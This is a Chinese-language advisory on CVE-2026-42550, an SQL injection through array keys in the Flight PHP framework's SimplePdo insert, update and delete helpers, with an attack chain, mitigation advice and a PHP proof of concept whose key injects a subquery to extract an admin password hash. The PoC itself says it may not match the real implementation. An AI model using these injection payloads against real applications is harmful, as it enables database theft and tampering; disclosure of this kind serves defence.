CVE-2026-42550 Flight框架SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-42550

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flight PHP Framework

漏洞概述

Flight是一个PHP微框架。在3.18.1版本之前，其SimplePdo组件的insert、update和delete方法存在安全缺陷。这些方法在构建SQL语句时，直接将$table参数和$data数组的键拼接到查询中，未进行标识符引用或验证。当应用将用户控制的数据传递给这些辅助方法时，攻击者可通过构造恶意的数组键注入任意SQL语句，导致数据库被非法操作。

技术细节

该漏洞的核心在于Flight框架的SimplePdo类在处理数据库操作时存在设计缺陷。具体而言，SimplePdo::insert()、update()和delete()方法在构建SQL语句时，仅仅是简单地拼接字符串。开发者通常关注数据值的过滤，往往忽略了数组键名也可能是用户可控的。当应用直接使用$_POST或JSON请求体作为$data参数传入这些方法时，攻击者可以将恶意的SQL片段隐藏在数组的键中。例如，通过构造键名为`column) VALUES (1, (SELECT * FROM sensitive_table)); -- `的数组，可以破坏原有的SQL结构，从而注入并执行任意SQL命令。这种SQL注入属于“标识符注入”，绕过了传统的参数化查询防御机制。由于CVSS评分为8.8，且无需用户交互，该漏洞极具危险性，攻击者可轻易获取数据库权限，导致数据泄露、篡改或丢失。修复后的版本引入了严格的标识符验证机制。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标应用程序是否使用了Flight PHP框架，且版本低于3.18.1。

STEP 2

步骤2：载荷构造

攻击者构造包含恶意数组键的HTTP请求数据（JSON或表单数据），键中包含SQL注入语句。

STEP 3

步骤3：发送请求

攻击者将恶意数据发送到应用程序的API端点，该端点直接将用户输入传递给SimplePdo的insert、update或delete方法。

STEP 4

步骤4：执行注入

服务器端Flight框架处理请求，将恶意的数组键直接拼接到SQL语句中并执行，导致恶意SQL命令在数据库运行。

STEP 5

步骤5：达成目的

攻击者成功窃取敏感数据、篡改数据库内容或破坏数据库可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// PoC for CVE-2026-42550: SQL Injection via Array Keys in Flight Framework

require 'vendor/autoload.php';
use flight\database\PdoWrapper;

// Setup database connection
$db = new PdoWrapper('mysql:host=localhost;dbname=test', 'user', 'pass');

// Malicious payload: The array key contains SQL injection syntax
// The application code likely does: $db->insert('users', $_POST['data']);
// If we send a POST request with 'data' having the following structure:

$maliciousData = [
    'username' => 'victim',
    // The key below attempts to break out of the INSERT statement structure
    // and inject a subquery to extract the admin password hash.
    // Expected SQL: INSERT INTO users (`username`, `password`) VALUES (?, ?)
    // Injected SQL: INSERT INTO users (`username`, `password`) VALUES ('victim', (SELECT password FROM admin_users WHERE username='admin'))
    // Note: This depends on the exact implementation of insert(), but key injection is the vector.
    'password`) VALUES ((SELECT password FROM admin_users WHERE username="admin")); -- ' => 'any_value'
];

try {
    // Vulnerable call pattern found in many apps using Flight helpers
    $db->insert('users', $maliciousData);
    echo "Exploit executed successfully. Check database for changes.";
} catch (Exception $e) {
    // Error might occur due to syntax, but partial injection might execute or error reveals info
    echo "Error: " . $e->getMessage();
}
?>

影响范围

Flight PHP Framework < 3.18.1

防御指南

临时缓解措施

在无法立即升级框架的情况下，开发者应在应用层面对所有调用SimplePdo方法的代码进行审计。确保在调用insert、update或delete方法之前，提取并验证$data数组的所有键，移除任何包含非字母数字字符（下划线除外）的键，仅保留预定义的合法字段名。